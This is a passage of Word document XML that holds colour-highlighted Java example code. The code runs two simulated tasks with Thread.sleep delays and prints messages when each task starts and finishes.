          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 1 Finished"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7E9CC"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 2 Started"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306104E3"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        task2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150540C6"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Task 2 Finished"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592AA46"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669AF7B3"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D77AD"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3077137"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F850609"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3077137"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45471C"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3000</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulate a 3-second task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5CDB8"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4071EFCC"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E094AEF"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758CAD41"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DF8F53"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8A2E9C"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3077137"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> task2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2AC6C6"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3077137"/>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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37188B4C"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3077137"/>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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Simulate a 2-second task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4B5A1"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3077137"/>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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D8C538"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3077137"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            e</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB17F1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printStackTrace</w:t>
      </w:r>
